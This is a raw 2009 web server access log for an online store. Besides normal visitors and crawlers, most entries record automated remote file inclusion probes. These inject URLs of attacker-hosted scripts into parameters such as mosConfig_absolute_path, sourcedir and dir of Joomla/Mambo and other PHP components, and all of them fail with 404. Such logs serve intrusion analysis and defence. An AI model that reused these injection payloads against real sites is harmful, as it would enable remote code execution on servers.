162.83.230.56 - - [21/Jun/2009:01:59:34 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18"
162.83.230.56 - - [21/Jun/2009:01:59:34 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18"
162.83.230.56 - - [21/Jun/2009:01:59:34 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18"
162.83.230.56 - - [21/Jun/2009:01:59:34 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18"
162.83.230.56 - - [21/Jun/2009:01:59:34 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18"
162.83.230.56 - - [21/Jun/2009:01:59:53 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64808 "http://www.acesurgical.com/trufix.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18"
162.83.230.56 - - [21/Jun/2009:01:59:54 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18"
125.140.142.39 - - [21/Jun/2009:02:00:08 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
125.140.142.39 - - [21/Jun/2009:02:00:08 -0400] "GET /logs/access_log.Q109052700//yabbse/Sources/Packages.php?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
125.140.142.39 - - [21/Jun/2009:02:00:08 -0400] "GET /logs/access_log.Q109060900//yabbse/Sources/Packages.php?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
125.140.142.39 - - [21/Jun/2009:02:00:09 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.189.2.38 - - [21/Jun/2009:02:02:48 -0400] "GET /index1.php?op=http://www.chfeel.com/chfeel/bbs/id1.txt??%20? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.189.2.38 - - [21/Jun/2009:02:02:48 -0400] "GET /logs/access_log.Q109052200/index1.php?op=http://www.chfeel.com/chfeel/bbs/id1.txt??%20? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.2.38 - - [21/Jun/2009:02:02:52 -0400] "GET /logs/index1.php?op=http://www.chfeel.com/chfeel/bbs/id1.txt??%20? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.6.17.151 - - [21/Jun/2009:02:04:07 -0400] "GET /logs/access_log.Q107070800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
201.232.54.48 - - [21/Jun/2009:02:04:18 -0400] "GET /skin/zero_vote/login.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:02:04:22 -0400] "GET /logs/access_log.Q109051500/skin/zero_vote/login.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:02:04:22 -0400] "GET /logs/skin/zero_vote/login.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:02:04:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [21/Jun/2009:02:04:53 -0400] "GET /logs/access_log.Q109051300/skin/zero_vote/login.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:02:05:48 -0400] "GET /logs/skin/zero_vote/login.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:02:05:48 -0400] "GET /skin/zero_vote/login.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:02:05:48 -0400] "GET /logs/access_log.Q109051500/skin/zero_vote/login.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:05:56 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:02:05:56 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:02:05:56 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:02:06:00 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.826"
201.232.54.48 - - [21/Jun/2009:02:06:27 -0400] "GET /logs/access_log.Q109051300/skin/zero_vote/login.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.140.142.39 - - [21/Jun/2009:02:06:32 -0400] "GET /logs/access_log.Q109052700%20%20//yabbse/Sources/Packages.php?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
125.140.142.39 - - [21/Jun/2009:02:06:32 -0400] "GET /logs/access_log.Q109060900%20%20//yabbse/Sources/Packages.php?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
213.189.2.38 - - [21/Jun/2009:02:06:50 -0400] "GET /logs/access_log.Q109050700/index1.php?op=http://www.chfeel.com/chfeel/bbs/id1.txt??%20? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.80.195.34 - - [21/Jun/2009:02:07:46 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; Media Center PC 4.0; .NET CLR 1.1.4322; Media Center PC 3.0)"
201.232.54.48 - - [21/Jun/2009:02:08:22 -0400] "GET /logs/access_log.Q109051500%20%20/skin/zero_vote/login.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:02:08:25 -0400] "GET /logs/access_log.Q109051300%20%20/skin/zero_vote/login.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:02:08:37 -0400] "GET /logs/access_log.Q109051500%20%20/skin/zero_vote/login.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:02:08:41 -0400] "GET /logs/access_log.Q109051300%20%20/skin/zero_vote/login.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:02:09:18 -0400] "GET /images/nav04_myaccount_over.jpg HTTP/1.1" 200 1443 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [21/Jun/2009:02:09:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.122.142.249 - - [21/Jun/2009:02:10:33 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:10:33 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:10:33 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.140.142.39 - - [21/Jun/2009:02:11:46 -0400] "GET /logs/access_log.Q109052700%20%20//yabbse/Sources/Packages.php?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
125.140.142.39 - - [21/Jun/2009:02:11:47 -0400] "GET /logs/access_log.Q109060900%20%20//yabbse/Sources/Packages.php?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:12:47 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:12:47 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:12:47 -0400] "GET /logs/access_log.Q109060500//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:13:14 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:13:14 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:13:14 -0400] "GET /logs/access_log.Q109060300%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:13:14 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:02:14:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.14 - - [21/Jun/2009:02:15:16 -0400] "GET /images/download_tut_tissue.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
222.122.142.249 - - [21/Jun/2009:02:16:45 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:16:45 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:16:45 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:16:45 -0400] "GET /logs/access_log.Q109060300//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:02:18:35 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:02:18:35 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 240 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:02:18:35 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:02:19:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.11.230.36 - - [21/Jun/2009:02:20:23 -0400] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:02:20:23 -0400] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:02:20:23 -0400] "GET /logs/access_log.Q109060800%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:02:20:43 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 269 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:02:21:19 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0048644B1D22B100301E04S+WSEQ(S0060):1+OUITEM(A0200):04942002 HTTP/1.1" 200 27021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.11.230.36 - - [21/Jun/2009:02:21:38 -0400] "GET /logs/access_log.Q109061400%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.44.126.182 - - [21/Jun/2009:02:22:44 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.44.126.182 - - [21/Jun/2009:02:22:44 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.44.126.182 - - [21/Jun/2009:02:22:44 -0400] "GET //skin/zero_vote/error.php?dir=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.44.126.182 - - [21/Jun/2009:02:22:51 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:02:23:56 -0400] "GET //include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:02:23:56 -0400] "GET /logs//include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:02:23:56 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:02:23:58 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:02:23:58 -0400] "GET /logs/access_log.Q109050800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:02:23:58 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:02:23:58 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:24:18 -0400] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:24:20 -0400] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:24:20 -0400] "GET /logs/access_log.Q109060800%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:02:24:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
63.147.72.145 - - [21/Jun/2009:02:24:31 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:24:32 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:24:32 -0400] "GET /logs/access_log.Q109050800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:24:37 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:02:24:53 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:02:24:55 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:02:25:03 -0400] "GET //include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:02:25:03 -0400] "GET /logs/access_log.Q109051100%20%20//include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:02:25:03 -0400] "GET /logs//include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:02:25:22 -0400] "GET //include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:02:25:22 -0400] "GET /logs//include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:02:25:22 -0400] "GET /logs/access_log.Q109051100%20%20//include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:25:38 -0400] "GET /logs/access_log.Q109051100%20%20//include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:25:38 -0400] "GET //include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:25:38 -0400] "GET /logs//include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:25:46 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:25:50 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:26:09 -0400] "GET //include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:26:09 -0400] "GET /logs//include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:26:09 -0400] "GET /logs/access_log.Q109051100%20%20//include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:26:45 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:26:45 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:26:46 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:02:26:57 -0400] "GET /logs//include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:02:26:58 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:02:26:58 -0400] "GET //include/write.php?dir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:27:01 -0400] "GET /logs/access_log.Q109050700/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:27:12 -0400] "GET /logs/access_log.Q109061400%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:02:27:15 -0400] "GET /logs/access_log.Q109060800/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:02:27:21 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:02:27:21 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:02:27:21 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:02:27:21 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:02:27:35 -0400] "GET /logs/access_log.Q109060800/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:02:27:35 -0400] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:02:27:35 -0400] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:02:27:39 -0400] "GET //includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:02:27:39 -0400] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:02:27:39 -0400] "GET /logs/access_log.Q109052900//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:02:27:40 -0400] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:02:27:40 -0400] "GET //includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:02:27:40 -0400] "GET /logs/access_log.Q109052900//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
